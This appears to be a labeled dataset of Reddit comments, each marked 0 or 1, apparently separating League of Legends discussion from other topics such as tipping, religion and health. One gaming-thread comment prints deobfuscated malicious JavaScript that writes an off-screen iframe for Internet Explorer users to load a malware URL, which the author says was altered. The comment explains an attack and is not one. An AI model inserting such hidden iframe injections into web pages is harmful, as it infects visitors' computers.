0	Because OP:   a) Used a picture previously popular on reddit   b) Make an implied buddy-buddy relationship between two members of the feline family   c) Used a meme to elicit one of the strongest connections in the human brain other than smell (fondness for something being cute, evolutionarily tied to our children from us in a protectorate manner), albeit incorrectly.   d) Made a pun, albeit not the best option.   Plus the time it was posted (~4-5pm Eastern Time, GMT -5) is a high time for reddit, so there's bound to be more people on. And with students finishing up finals and people coming home from work around that time, people might be in a dull sense of mind and would upvote really anything. Plus, this is a default subreddit, and most people are too lazy to remove it, and so it appears on their front page; if it's already on the front page, it must be good, have an upvote.   Once you break it down into tactics, it's really not that hard to figure out why a misused meme with the lack of a brilliant pun has so many upvotes. Either OP is crazy smart and cunning, or stupid and lucky. I'm going with the latter.
1	1)  Being able to kick a player who is toxic in the lobby is probably the most effective way to deal with a toxic player in the lobby (Redundant I know). This is purely based on the fact in how you are meeting other players since you have very little control over who you decide to interact with since you are forced into playing with them. (Do not let this be a normal queue feature otherwise pre-mades can easily abuse this)   2)  As a solution to normal ranked queue, I don't see this as a good solution. You would run into the issues that WoW has were many people want to queue for specific roles which would cause long queue times for some roles and shorter ones for others. People would abuse this by queuing for support or a short time roles just to play another role. So it would not solve anything.   A better solution than this would to make it easier for players to find others to play with in a ranked 5s team. To solve many of these issues, I think putting more focus into people playing ranked 5s rather than single queuing would be the best way to cause fewer problems. The problem that arises in solo queue is that you have conflicting personalities and although the same issues arise in ranked 5s, people have much more control over who they play with.   Giving more rewards in ranked 5s as well as making it easier to find people to play with would make it more popular and cause fewer problems with randoms but allow people to work out problems with their team and go to a new one if necessary much like how arena works in WoW. For rewards, you would need to get people to play as well as get them to continue playing ranked 5s. To accomplish this, introducing a currency that can only be obtained from ranked 5s that would be able to buy certain skins would be the best solution. I'll call the currency Legend Points or LP. There would be a cap per week on LP and the higher your rating the larger the cap would be, much like how arena points work in WoW. This would keep people playing as well as introducing skins at the end of the season for certain ratings in ranked 5s.   Another issues restricting people from playing 5s is the social aspect that games like WoW have where you can easily find people to play but LoL has a much harder time meeting people who you may not have played with before which would fit into your team. Since people taking the initiative to play arena or ranked 5s are much less likely to troll or be negative and can be easily replaced if you feel they are not performing or they are too negative to fit in with your team. Increasing the popularity in ranked 5s would go a long way in improving how much of the player base enjoys the game and hopefully would encourage people to try their best in ranked games in order to find people who would want them on a team.   3)  Making a Prisoner’s Island would not solve many issues. It would not help in the short team such as in champion select and it would not help in the long term since you are putting that person in a negative environment and not allowing them to improve but rather encouraging them to continue their negative attitude. Another problem that arises that even if a player is positive in this terrible environment, getting out of it would be a rather difficult task.
1	in my last days of my gold climb (i do it every season for the free skin; not ambituous enough to go further), silver 1, i had a streak of about 16 games in which i had 13 afks on my team (11 of them the whole game). maybe you are lucky but rager/intentional feeding/and leaving the game on purpose happens way to often and needs to get punished way harder.  i know its a game and its about having fun but if i dont want to take it serious i dont queue for ranked. everyone who queues for ranked should commit himself enough to the game to give his very best the whole time, thats why there are several game modes and a lot of opportunities to play just for fun.
1	Wait, what unjust bans have you seen? Every single "unfair ban" posts have been proven by majority on reddit to be fair bans...   Also, Here's my take on the tribunal, just a little food for thought: A lot of people don't understand what the tribunal is. It's not the place where you go to possibly be punished, it's where you go to be pardoned. The only people who go to the tribunal are the shitiest of the shit, if you make it to the tribunal no offence but your the bottom 4% of the entire community (bottom .7% now). By all rights, just making it to that bottom rung, you should at least get a time ban. But Riot wants to give you a second chance. They know that in the time it took you to get down there you could have changed. So they take your last months reports and give it to the tribunal. If you've changed you've earned your pardon but if not you get the ban you deserve. The thing is, everyone down there deserves it already, so it really only takes one game. One game to prove that you still are a rager at heart and should reflect on it in way of a time ban.
1	Mana on ANY champion is dealt with by being smart on your ability use. If you spam all of your abilities every time they are up you will run out of mana. If you throw spears at a chogath who can instantly heal up, you are wasting mana. Try to wait until level 3 to throw spears for harrass unless they are squishy and you think you can get an early kill or deny. There is more to it but,
1	I like the idea behind those changes that allow carry junglers to farm up and become a threat mid-late game, but I am really concerned about the way its going to work out. You mentioned that Wriggle's Lantern will become a "farm jungler" item, but if I decide to buy this item does that mean that I won't be ganking or roaming around, at all? Let's take Nocturne for example (since he needs items to stay relevant later in the game) - One of the reasons why I love playing Nocturne is that he can farm up the jungle and still remain a very mobile ganker (and sometimes from very wierd positions) with Paranoia, and still have very decent ganks before level 6. However, does that mean that as Nocturne, if I decide to buy Wriggle's Lantern, I'll have to farm jungle creeps for my gold income and barely do any ganks? And if I decide to go for Spirit of the Ancient Golem, does that mean that I will have to gank for my gold income without farming  the jungle?
0	Alright, so I'm a food runner as the name says, and actually made this account to comment on this, while I agree with not tipping well if the service sucks, but often times, you aren't just hurting the server if you don't tip well. If you don't want to tip the server, maybe a bartender made a perfect drink for you, or the food runner ran out of their way to get you extra sauces, or the bus boy refilled your water 36x before you got up, you aren't just hurting the waiter in most places, you hurt everyone below them. On behalf of a food runner who has worked for 3 years, always has a smile, and will never complain about getting you whatever sauce, bread, biscuits or your jacket from your car (happened once) that has NEVER received a tip directly from a customer, please, spread the wealth. Often times a bad waiter can ruin a night, but ask others! I have run to the kitchen and called out food on the fly (pissing off the kitchen staff) if I realized something wasn't right. And if you really want to get a point across to the waiter? Walk to a manager and tell them to tip the kitchen staff, and make sure they do. It may sometimes have a wait, but they work their ass off from open to close making food, and sometimes, shit gets fucked. But they never get anything from customers, besides empty plates.
0	Why are you eating out without money for a tip?   If you do have the money, why care so much about spending it on a tip? Is the server's life SO important to you that you feel compelled to 'teach them a lesson'?   Seems to me like what this is all about for you is nothing more than an exercise of power because you lack some in your own life. Grow up and stop giving a shit and maybe things will change.   On a final note, if you were to receive bad service and still tip that server would undoubtedly treat you much better the next time you came in. For one thing it shows that you have compassion for people who work stressful jobs. Additionally it demonstrates your capacity for self-control and reason, since not tipping someone is like a show of dominance over a fellow human being.
1	Playing jax into teemo involves getting E lvl 1 and abusing the dodge duration to last hit. (You can even put a few points into it to lower the cd)   Try to get better boots than  him by lvl 6. IE boots2 if he has boots1. You dont really need items to pressure him at 6. Then at 6 do the usual 2 hit on minions -> leapstrike/AA/empower combo. If he fights you, use E and fight you'll win as long as you dont get shroomed. If he runs and trys to AA you when retreating you have E to prevent dmg. Blind will not stop the passive magic dmg from your Q/W/R and teemo will be forced to chug many hp pots or be killable.   All you have to be wary of is jumping into a mushroom and your mana. (Flask stronk vs teemo).   Last hitting early on means you have to abuse the brush. Do this for the whole lane, pink wards are useful both for jumping and clearing mushrooms out of toplane bushes. Besides the boots2 I rush sheen if I have gotten rather farmed. Bilgewater cutlass is great for pressuring the teemo as well as the slow helps counter the mobility teemo has via move-quick. (Try to save it after he uses movequick). Then I just go TF or BoTRK depending on what the first pickup was.   Lastly, teemo is very susceptible to ganks if you pink and clear his mushrooms. Early ganks help you combo him faster. If you ever have a lvl advantage use it pre-6 to bully with Q/W combos. Once you hit 6 he cannot do much unless he pulls ahead in exp early on.
0	Was at a ground breaking ceremony for a church where the members were predominantly high members of local society. Millionaires and whatnot.   I was goth. Trenchcoat. Black hair. Fairly well dressed. White button down, black pants. You know, before 'Emo' and 'skinny jeans' took over.   Group of kids/teens aged between 16-19 start asking me if I believe in Jesus. I inform them that I am agnostic deist, and that I was dragged to the ceremony unwillingly.   They start in on how amazing Jesus is. They start droning on about how they were meth/pot/heroine/prescription drug addicts, or had been brought back to the light from being gay, or had had premarital sex and had a baby before wedlock and what not.   Jesus saved them.   I asked them a simple question:   "Do I have to go be a drug addict or make stupid life decisions to find Jesus? If I do, I will never find him."   Never done serious drugs.   Never got anyone pregnant.   Was never romantically interested in men. (Though I have no problem admitting if one has a fine ass or gorgeous body--physical beauty is physical beauty).   They asked me why I dressed in black.   I quoted Johnny Cash.   They asked why I had long hair.   I told them that I have a freedom to my own sense of expression, whether or not they think that I fit into the norms of those groups who also have long hair or wear black.   They asked me if I believed in Jesus.   I tell them that I believe he was a man--a great man, who loved to beat up bankers with a whip and refused to throw stones at anyone for their sins--reminding them that that was exactly what they were doing.   "Judge not, lest ye be judged."   "Let he who has not sinned cast the first stone."   Informed them that my life was my own, and my decisions were my own. Several of them became violent/aggressive about their proselytizing.   One of them punches me.   I told him that I forgave him for his actions, because he is weak, and I turned the other cheek.   One of the girls started crying. Another of the guys grabbed the arm of the guy who punched me. They realized that they were attacking someone who knew more of the soul of their religion, rather than the preachy bits.   In the end, I wound up having a discussion with them all on the generalities of why I felt the way that I did and why I did not believe that religion was the pathway to nirvana, but that it could be found within.
1	Fiora has an ability that gives her 120% bonus AS, 35 AD persistently, and has a non ultimate gap closer and an ultimate that allows her to deal tons of damage and become untargetable. Just having decent base numbers on abilities is one thing, actually being able to make use of them is another. He now has neither mobility, nor gapclosing potential, nor the built in tankiness to get in range to use his high numbers. ESPECIALLY when he activates his ultimate. Basically he will melt before he gets in range to do damage, if he is built for damage, and not do enough damage when he finally gets close enough if he builds tanky. If they have CC, which they will, you will have to activate your ult in order to get close to a sensitive target, in whice case you might get 2 autos off with that 80 bonus AD before your ult wares off. Also, his early game will be even worse than it use to be with nerfs to his ult, his Q and his E, so by the time you can afford those items you will more often than not be way behind your opponents. This is not to say that he will always be bad, but it will be very rare that there will be a time he will be a good choice for whatever role needs to be filled.
1	I'm pretty sure the highest you can go is Plat 1. So I think your normal. It's just how it is. Challengers players max out at Plat 1 too, so yeah.
1	DL is a diva,   Seraph a believer.   Dexter is German,   And Aphro a Gentleman.
1	In which real game would anyone be able to get 1300 AP on Janna? Not to mention that it doesn't happen with Veigar nor any other standard mage.   And even if somehow someone could pull off such silly build, her damage would be pathetic compared to any AP scaling Champion.   I'd take a 1300 AP Leblanc over Janna every time.
0	You are aware that its about FINDING A CURE right? also are you under the impression that they are going to be like "we found a cure for cancer, but ONLY breast cancer. Damn people sure should have worn more colors!"
1	I started playing league half a year ago, i played roughly 450 normals before starting ranked 2 months ago.  I quickly reached 1300 playing mostly ahri,morg,diana mid, jax, irelia and riven top and amumu, noc and lee jungle (I still suck at jungling sadly). I recently practiced a lot of both adc and support in normals and my adc play actually carried me from 1400 to 1480ish. Last Weekend i had a bad day and lost 7 games dropping to 1370 just before reaching gold.  So yesterday I went on a rampage and won 7 games 5 of those in a row, just barely hitting 1506 and GOLD :)   Thanks to Backpedaling for personal advice (he's my rolemodel).
1	Webdev here.   Basically the site loads up a javascript file (based on a popular javascript from Twitter), which unfortunately has been injected with  malicious code . The malicious code is  embedded directly in their website . That's bad.   Parsing the obfuscated code, I get the following:   if (navigator.userAgent.indexOf("MSIE") &gt; 0 ){     document.write('&lt;style&gt;.jz97521lox { position:absolute; left:-1104px; top:-1792px} &lt;/style&gt; &lt;div class="jz97521lox"&gt;&lt;iframe src=" width="172" height="132"&gt;&lt;/iframe&gt;&lt;/div&gt;'); }    The above code injects an iframe (subpage) into the current page, which loads up the URL you see above and then infects your computer with whatever.   Note that I've changed the URL above a bit, so no newbies check it out from curiousity. The original does have malicious code and AntiVirus software will detect/block it. The code above is also mainly targeted towards Internet Explorer users as the security with IE isn't as high as the other browsers in some rare cares.
1	The main difference though is that qtpie's stream is soloq while this is the stage where it counts and plays there are far more impressive due to the pressure these guys are under.   I d still say it was a massive outplay that should be recognized.
0	So... if you didn't want to adult you shouldn't have had kids. My wife and I have a functioning marriage and are responsible for a 2 year old. I don't get the choice to pawn my kids off on my ex. I hope your kids don't get wind of your feelings, because how much will it suck when your kids hate you...
1	The only champion I ever beat Nidalee with is Aatrox. Not because I main him though, I'm a terrible player at this game yet I've never had trouble with Nidalee.   Aatrox (AA, S, OS - debatable, CC)   Aatrox starts with a doran's shield and survives vs her early poke while sustaining through her little damage.   This is a mostly skill based match up in  my opinion, the only way Nidalee can win this is if her garen ult is enough to burst him down in one combo. What Nidalee players don't realise is I have to die when they go for the all in cougar form. Either I survive it then I Q + E for cc and land autos to lock her down or my passive gets popped which either way the Nidalee loses.
1	If this is your first time playing MOBAs or video games then bronze isn't too bad. There's a lot to learn (from reactions to events or even what items to buy) and it's hard for you to pick out what's right and wrong in game. Sometimes an incorrect decision appears to be right because the opponent made a mistake too. Most of what I've learnt comes from streams on youtube (Itzhao for Top, Scarra for Mid, Foxdrop for Jungle and Phy for ADC) and I personally feel they've helped me up my game from Silver 4 (start of summer) to Gold 5 (where I'm at now).   Also, a good attitude helps loads! Be willing to learn after every game, even if you did amazing. Think of how you can improve! Don't get into arguments. There's no point arguing on LoL because people rarely listen anyways. Just play YOUR game and don't let anyone else affect you. Learn the meta!
1	Do you really care if Thresh is op? He is at the point where his kit will almost always make him a top 3 support but he is hardly perma banned(i.e super broken) but that's not so bad. The reality is that Thresh is fun as hell to play and is awesome to watch from a spectator perspective.  People always seem to want to nerf the high skill cap but strong champs which just makes the game generic and boring. I mean do you want to stop seeing 'godly Thresh plays" in LCS? Do you like watching Soraka being played? OMG those clutch heals so exciting. Jesus people will complain about anything. Yeah I understand his kit is overloaded but so fucking what. Thresh plays are awesome to watch and are fun as hell to do.
0	What if I told you that unnecessary stress on a pregnant woman could lead to birth defects. Don't roll over, but maybe be an adult, realize that she cannot control her reactions as well as she can when not pregnant due to hormone imbalance, and wait for her to be calm to try and retort. Or don't get someone pregnant that you can't have intelligent debates/disagreements with.
1	It really depends on who your against. If you need to secure Dragon/baron with the bonus magic damage and you don't want to spend a lot of money on wards then get Wriggles.   If you don't need the early life steal/armor/ward. and you are already building early mercury treads for their CC then build Spirit.
0	I know it probably sounds silly but it just seems like one of those things that annoys me.   Vegan/vegetarian is a choice, but almost on another level. I don't like a lot of foods and I make the choice not to eat them but if there's a little bit of it in my food (or it came in contact with that thing) I'm not going to shy away like it's poison. I see a lot of vegetarians who behave that way and it just makes it inconvenient.
1	I remember my first game vividly. It was a custom game with two of my friends. I had absolutely no idea what I was doing and my friends really didn't explain anything about anything to me. Out of the free week champions that were available at the time I picked Veigar because I thought it was a good idea at the time. He looked all magical and stuff, why not?   So as the game is loading, I open up a wiki page on Veigar on my second monitor, so I can see details about him while I am in game. This is something I did a lot while I was learning the game. We get in game, I pick up my Doran's ring first and get a point in my Q. I go bottom lane because they told me too, and they go off somewhere else. I didn't know where, because you know, what is map awareness?   I'm sitting there for a bit and then here comes Soraka Bot down the lane. I'm thinking I can take her straight up 1v1 at level 1. I  click  on my Q and then  click  on Soraka Bot. PSHEUUW, TAKE THAT SORAKA! But now she starts throwing terror bananas at me, and there's some...like...star things...coming from the sky! I strike back with my own attacks, but suddenly these weird little creatures are throwing sparkles at me from nearby. Odds were not in my favor, and I quickly died to Soraka Bots unrelenting banana assault.   "Guys...I think I just died to that thing. What happened? Why did I lose that?"   AH HA HA HA LOL DUDE X, DID YOU SEE THAT? HE DIED TO SORAKA, FUCKING SORAKA MAN!   OH MY GOD HA HA HA MY FUCKING SIDES HOW CAN YOU DIE TO A HEALER? HA HA HA YOU DIED TO A HEALER!   "I don't understand, what is she-"   HA HA HA HA HA HA HA   (¬_¬)   So I'm back alive now and I get back to bottom lane, where the banana monster and the sparkle creatures live, and I decide to just auto attack minions because I have no idea what I should be doing at the moment. I'm pushing and pushing, but I have to recall sometimes because of damage from the banana monster and the sparkle creatures, and I didn't know what I was supposed to do about them.   I tried throwing my Event Horizon on the banana monster, but she stood perfectly in the center auto attacking minions, even though I had just thrown up a huge cage...thing! And the cage did nothing! It was at this point I realized that my attacks were useless against the powerful banana monster, and my best chance was to try to level up and pray that my friends were strong enough to defeat this demon, because I couldn't do a damn thing.   I have about one or two thousand gold now, but I haven't bought any items. I still got my Doran's ring and that was it. I recall and go back to lane when I get asked a question.   Why didn't you buy anything at the base?   "What do you mean?"   You have money right? You buy more stuff with it, obviously.   Well if I didn't do that, it must not be so obvious. "Are items really that important?"   Uh yeah, they are kinda a huge deal. Really important actually.  One of them chuckles in the background.   "Okay, well I'll go back then. What do I even get?"   After a discussion, I get boots and a Tear of the Goddess. Feeling more powerful (even though I don't actually have any more damage), I go back to bottom lane, but something is wrong. My tower is missing! It was just here a second ago...where did it go? Did the banana monster steal it? Because if she stole it, I was going to need more help than I thought before.   Wow, you lost the tower to Soraka? Oh my god you're so bad...   Yeah no kidding. But they said I lost it, so that demon probably didn't steal it. Had to be my fault. But if I lost it, maybe I can go find it again? I knew what I was going to do next.   One of my friends mentions that they just hit a level. I don't remember which, but I do remember that the level they just reached was higher than mine. I question this.   "How are you leveling up so fast? I'm not even close to your level."   Oh he's jungling. Has been the whole time.   "Jungling? What's that?"   It's a thing where instead of being in a lane like you are, you go into this jungle area here and kill the monsters in there.   "Oh ok...can I do that?"   LOL HA HA HA HEY DUDE X, HE SAYS HE WANTS TO JUNGLE VEIGAR! HA HA HA   OH AH HA HA HA HA! I HAVEN'T LAUGHED THAT HARD IN A LONG TIME!   "I don't get it why can't I-"   AH HA HA HA HA   ｏ( > <)o   To be fair, this was back before the new, easier jungle we have in season two. Still though, I didn't understand what the problem was. I decided it was probably best to just stay in my lane and find my tower again.   Then here comes this green dog thing from no where. It gets really big and kills the banana monster in no time. Wow! So powerful! What is that? Who was that?   Ha ha how were you having trouble against that?   "I don't know."   It's a healer! And you're Veigar!   "Yeah, but-"   But nothing!   At this point I pretty much realized that they were not going to explain anything, so I just asked them what things were, and then looked them up on the [Wiki.](   We did eventually win, and while I never found my tower and got neglected pretty much the whole game, the banana monster lost. That made it all worth it. We beat the banana monster! Yes! And almost two years and over 2k games later, I'm still playing.   And I still hate Soraka.
1	I know this will probably get buried or down voted, but here it goes.   This was going to be my first eSports event. I had saved up for about 2 years to go to an event with my dad. Finally when IPL6 had announced its date, i knew that was the one. Got hotel reservations and plane tickets at a decent cost for me and my dad. This was going to be amazing for both of us. When i heard about the possible cancellation of the event i started getting really nervous and started reading everything on it, and when it got canceled my heart broke. I'm not old enough to really participate in everything vegas has to offer and I'm not really all for the sun aspect of vegas either. My hotel couldn't refund full price, and i couldn't get the flight tickets taken care of either. At least i'm getting money back from the GA tickets, but still, i wish i could have experienced this event....
0	I was always  decent  with chopsticks, but When I was traveling in Japan, I took the train everywhere; and the stores in the train stations would sell little bento boxes (packaged meals, think lunchables but fancy, and REALLY FUCKING GOOD), with...chopsticks. Now I like to think I'm pretty damn good with the utensil.
1	Ya, but your theory doesn't work.   See the system balanced mmr with every match, so you can't inflate the system(which is what would happen if what you said did).   If you want 4 players to receieve half mmr(let's give it a random number of 12 base)   That's 6 6 6 6, or 24 mmr not taken from the team. Meaning that if you want to pile this on to the leaver, he'd lose 3x the normal amount, so instead of 12, he'd lose 36.   This is the only way for your system to be implemented without causing massive elo inflation.
1	Leave base at the beginning with a mana crystal, when you first back aim to buy a tear and maybe a catalyst if you can afford it. you want to get your rod and tear asap to start stacking. Get sorc boots along the way. Then you have the choice of building frozen heart or spirit visage depending on teamcomp and who's feed. Finally get a void staff for the much need % penetration. Don't buy gauntlet lke some people say, you don't have time to aa to take advantage of the sheen, frozen heart also gives a lot more defensive stats. Abyssal is also a reasonable substitute for visage.
0	Fuck that. I've arrived to class (only a 5 minute drive for me) to find notes on the door, and sent an email to that professor from my phone right then about it. I copied and pasted the instructions from our syllabus email that teaches us how to send an email question out to the entire class for help. I told her that this could also come in handy if the professor were to cancel class. I reminded her that some people drive from 40+ minutes out. She apologized at the next session. Then did it again a few weeks later but wrote, "sorry!" with a sad face on the note. Kicker?  She had jury duty . So she knew she wouldn't be there.
1	I totally disagree with this article, I frequently play Karma and if she's played right can be a formidable champ. It's true that taking 6 levels to get to the equivalent of a normal champs lvl 5 ability is a slight disadvantage, however the fact that you don't have to spend 3 levels on an ulti makes it work out roughly the same, you've got one more point to spend on every move. Built correctly she's surprisingly tanky, as when on low health her passive means her shield blocks more and when combined with her Mantra also does more aoe damage, so when on low health using a quick R E R Q combo can deal significant damage while sheilding you from damage and then healing, if followed by a W on the chasing champ it not only slows them but speeds you effectively doubling the boost. Not to mention you can shield then heal then speed boost allies, and also shield and heal minions which is awesome for taking turrets. The aoe damage from her sheild also makes her a viable mid, as you can keep enemies off the minions/stop champs getting last hits, and farm entire groups in one move. If you build her as an AP tank (only using items that grant both AP and either Armour or MR) she becomes an extremely tough champion, not to mention that many people underrate her and don't know what she's really capable of.
0	I wish I could introduce you to my friend Adam.  He's by far one of the coolest people I've ever had the pleasure of knowing.  He came out to us about ten years ago (I'm 31 now).  His being gay only made a difference in the fact that he would bring another guy along when a bunch of us did couples things together.  Adam is funny and outgoing and makes everyone around him laugh and smile because he's such a great person to be around.   While I know and have met a number of gay people that are complete and total douches, some of them are no different than the straight bro douches, except they fancy other men.
0	I'm ADD/ADHD. Diagnosed by psychologists. Without my prescription, I'm spacey and have trouble focusing on tasks. With my prescription, I'm getting good grades as an Engineering and Computer Science dual major at a top 10 college on my way to get my masters in my 5th year. I'm also a 90's kid, born in '92 as my username would suggest. Read a fucking book or get some fucking facts. ADD/ADHD is a real diagnosable condition that can actually be treated for someone to reach their full potential.
0	As a former fatty to skinny i think the problem is that obesity is looked like a lack of self control when it is not easy to quit something you start early, while in actuality it needs to be looked at like a disease much like smoking.  Sugar is addictive as hell, and some people are more susceptible to it.   I also believe that the majority of large women are not curvy but just overweight and out of shape and they use this curvy reasoning to justify their laziness.  At the same time the fashion industry is going for a crazy overly skinny style that they post is attractive.   The solution is pretty easy for those that want to be skinny.  www.fit2fat2fit.com and only eating during a 8 hour window every day.  It will stop the majority of bing eating and is a sure fire way to get in shape.  Dont buy the pills ect ect, just get stuff off amazon thats equivalent.
1	I don't think they made it better this way.   2850 gold is too expensive for supports, 50 ap is too few for apc for that cost, on junglers the item would be ok, but there are way better options for them, No ad jungler could buy it, since it gives him ability power.   I feel it would be much better if the blasting wand would be replaced by a kindlegem (for extra health & cdr), or an emblem of valor (bit armor in lane, regen aura), both good items for supports.   Atm I can't name 1 champion for who this item would be a good choice the way it is. And The active is not THAT great, I bought it today on taric support in ranked because we were 24/6 at 15 minutes and it was already over. And after buying it, I actually felt weaker.
0	So, after doing my research to provide some links, it looks like we aren't as singular as I had previously thought. I would say it looks to be about half and half. In countries like Germany, English is widely spoken and known. And in france not so much. You would want to learn french.   On average, most European and African countries  are  more multilingual than the US, but that is due to the propogation of French in Africa and the EU now making borders a lot more hazy.
1	I just finished my first game with her, went something like 8/11/17. Ended up playing kind of a support/assassin role. She definitely can fill many roles in a fight, but you have to work hard to position yourself and kind of "slip in", so you're not immediately seen as a threat (kind of like Akali I guess).   I started Doran's Blade into Merc Treads and Wriggles. Laning was a little rough for a while, but that was because I was against Taric and Riven, and their double stuns were pretty effective. She has an amazing way of getting in and out fast, gaps aren't really an issue for her.   I built Wit's End next, for tower downing speed and because the enemy's Karthus was getting majority of kills. I then got Brutalizer, BT and Hexdrinker, selling my Doran's Blade for the last one. I noticed a significant improvement in my ability to "matter" in teamfights when I got AD (Brutalizer and BT), so I think next time I'll go Wriggles into a straight BT for some lane power and effectiveness against squishy targets. Her shield is extremely effective, and I found the Brutalizer CD reduction was awesome too.
1	When starting to jungle Udyr is probably THE safest pick, he deals ok in jungle duels, has fast clear, cc and is tanky. He is basically the jack of all trades a very easy jungler to feel comfortable with. (If you want alternatives Nocturne is also a very strong jungler as well as Nautilus)   If you wanted to jungle Udyr I recommend (for new to jungle):   Runes: Attackspeed reds, Armor Yellows, Magicresperlvl blues and movespeed quints (they are expensive, but you can use another quint for now)   Masteries: 0/21/9 Picking up both reduced damage masteries and armor in defense (minion and incoming) and runic affinity in utility   Skill order: RWRE (Then max RWEQ)   Item order: Start off with boots and some health pots > HoG > Phage (or aegis) > Wits end   This may not be uber standard but it will make sure you stay alive with your buffs if you misjudge something due to the early health and slow procs are cool! From here you can grab damage items like trinity force or go more tanky with randuins and banshee's veil. Just be aware that wits + Tforce is all the damage you should get (You need to tank for that ad carry!)   Route: Start at blue (take wolves if you can get some help damaging them) then go over to wraiths, golems, red then wraiths again to get level 4 (your cc!) You can then gank the two lanes either side of wraiths or do wolves and go to the other lane or mid.   I got counterjungled!: Don't panic! If it's earlygame they will likely have stolen one of your major buffs, this sucks for you a bit, but the good thing about udyr is that you can get back into the game quickly by clearing small camps and getting some good ganks off, just be careful for future counterjungling at about 7:10 and 12:20 when your first buff comes back up, you SHOULD be there! (If they are clearing small camps grab a ward to plop by wraiths and kill him with your mid!)   Counterjungling: If you feel like your enemy deserves your bear goodness go steal their big wraith with smite from time to time, this is a safe counter jungle for you to do often! If you want to get a major buff of theirs remember whenever they start their buff will be up 5 mins later (about 7:10) so grab a ward and put it near that buff you can safely take it as soon as it spawns then keep time on it to control it for rest of game! (Be wary of lanes coming to get you if they see you going there, map awareness is key)   Experience: A lot of jungling you will pick up as you play, just try to hit about 50cs per 10 mins and gank when you can, this is a pretty good cs target and you may not hit it for a while but be sure to balance cs with ganks to make sure that you stay in the game.   Ganking: Don't delay if it may be warded! if you are going bot by river bear stance straight into them, don't wait in the bush and give them time to realize you are there, go straight for them and give a healthy ping so your bot lane goes onto them as well. If you want to gank by lane (where you go into the big bushes at the side) take it slowly and make sure you are not seen then get the surprise, a flash wasted is a successful gank by the way!   Hope that helps!
1	I could not agree more. I've tried to point this out on general discussion but I don't have to tell you how that went over. The biggest irony in all of this is those who say Hatperson doesn't know what he is talking about. First of all, he does. Hatperson frequently casts alongside professional players (keywords: professional, pro) who know a lot more about the game than he does. Second, how can anyone say the Korean commentators are good when they don't even know what they are saying? I am by no means trying to undermine the Korean commentators but I keep hearing the same "The Korean commentators are so loud and exciting, it's always fun to listen to them." I agree, wholeheartedly I do. I love it when a commentator is so excited by the match and actually seems to enjoy what it is that they do. To say that Hatperson doesn't know what he is talking about is not a valid argument when the majority don't know what the Korean commentators are saying, and when half the time they are just shouting because of sheer excitement. I'm willing to bet there are Korean LoL fans who are annoyed by the Korean commentators.   I mainly watch streams to see my favourite teams play, but keep watching games of teams I don't know much about because I want either see weird lane comps, strange picks in general, but most importantly I'm keeping an eye out for new teams that are capable of making a name for themselves by beating the more well-known teams. Needless to say I was very excited for Mono and I completely understood Hatperson's reaction to their success.
0	Dude: I never said that. Cancer is typically a disease of age. The population most likely to get it has already likely reproduced. Thus, natural selection will not select against their genes. Furthermore, dude, think about the following: cancer occurs because of MUTATIONS induced by ENVIRONMENT. Unless the cancer is germline, said mutations DO NOT AFFECT their reproductive fitness, so any child of theirs would not have cancer just because their parent did. Some genetic alleles predispose people to cancer (ex. mutants of Ras, p53), but there is no specific gene that directly causes cancer.
0	Most awkward thing that has ever happen to me involving a girl who just got an abortion was a couple of years ago. I was going on this blind date set up by my friend and we were hitting it off pretty well. I had set my iPhone on the table and I got a message from my ex that read "I got an abortion thanks for giving me the money". I had no idea that she was pregnant my ex asked me for her part of the security deposit from the apartment we were sharing. The girl I was on a date saw it and that's when it all went downhill. I could tell this girl was pissed and I had no idea about any of the pregnancy because she, my ex, had moved from Honolulu to Baltimore. Now I know better to have your texts show up on your lock screen.
0	See MorsMiles comment below, but ask what the typical day is like, if there are core hours and what flexibility is offered in working around them. Ask what a typical project cycle is like, if it's applicable, and what sorts of tasks you'll be handling each day, week, or month. Where I work, most people will work the core hours of 7:30-4:30, often adjusting that by a half hour here and there. My group works longer hours most days, going from 7:15-4:30, 5:00, but we take off a little bit earlier on Fridays. Lately, I've been working until 5-6 every night because I'm finishing up a project, but my boss sees that and makes it clear (as he did when I interviewed) that it's noticed by him and that gives me flexibility to come in later or leave far earlier (2, 3pm) some days. It's all about communicating in absolute terms. When I was hired, I told them I had no problem working 45 hour weeks normally, 50 hour weeks as needed, and occasionally rising above that if necessary. What I didn't want was coming in on Monday to hear I'd be going from a 45 hour week to 60+ hour week indefinitely. This kills the motivation.
1	Using this thread to say something general about the rework:   For me it feels like his new W doesn't synergize well with the intended bruiser playstyle. There is no incentive for him to stay in melee range because his AAs do no damage, except for the 1 W proc.  His new W makes him more burst oriented than the old AD steroid, however glass cannon build doesn't work with the new ratios anymore.
1	Do not play champions you aren't familiar with because "they aren't banned" or "but they're a counter to  __ ". Don't treat it any different from how you would any normal game you wanted to win, and don't assume your opponents are any better than you are until they've proven it.
1	What's up
0	So 23 states that allow it outright, that's almost half, then you have these: Fl -persons 17 and younger on non-limited-access roads unless local law exempts them from the prohibition on minors riding the cargo areas of pickup trucks and flatbeds(that means no interstates or major highways, but everything else is fine) GA- any pickup truck off the interstate  KS -does not apply to vehicles not being operated in the state highway system or within the corporate limits of a city LA -people 12 and older if the truck is being moved on a non-interstate highway MA - people 12 and older NY - inapplicable to trips of more than 5 miles if there are less than 5 persons 17 or younger in the cargo area or if at least one person 18 or older is in the cargo area  NC - persons 15 and younger if a supervising adult is present in the cargo area SC - people 15 and older; people 15 and younger when an adult is present; TN - people 12 and older; people 6-11 in a vehicle being operated off the interstate or state highway system TX - vehicles that are the only vehicles owned by members of the household UT - off highway operation   So as long as you're not on the Interstate or major highway, usually you can.  If you're over 12-15, you're usually in the legal limit and some states think an adult can save a child in a wreck(I  know that's not the thought behind it)
0	Engineering student here. The problem here is that you may have found an easier way that works 20% of the time but theirs works 100%. Also the concepts may build. For example in diff eq its easy to solve an exact ODE but a little more complicated to make an ODE exact so you can solve it. So you need to find an integrating factor and blah blah blah and it builds on itself. If you find an easy way to get the answer cool, but unless it works for all situations your screwed.
0	Yesterday?  Fuzzy. Three days ago?  Even worse.   My mom reaching around the backseat to hand me the yellow and purple bear I named Rosie as we made a right hand turn out of the hospital parking lot?   Crystal clear - I was just over two years old.   I remember from about 2-15 crystal clear... and then it just starts getting fuzzier as time went on.   It's like my memory bank saved the memories on too high a definition, or something, and since I'm running out of space my brain just deletes the boring new memories to keep the old ones- you know, the ones that remind me to return library books, and pay bills on time and stuff.
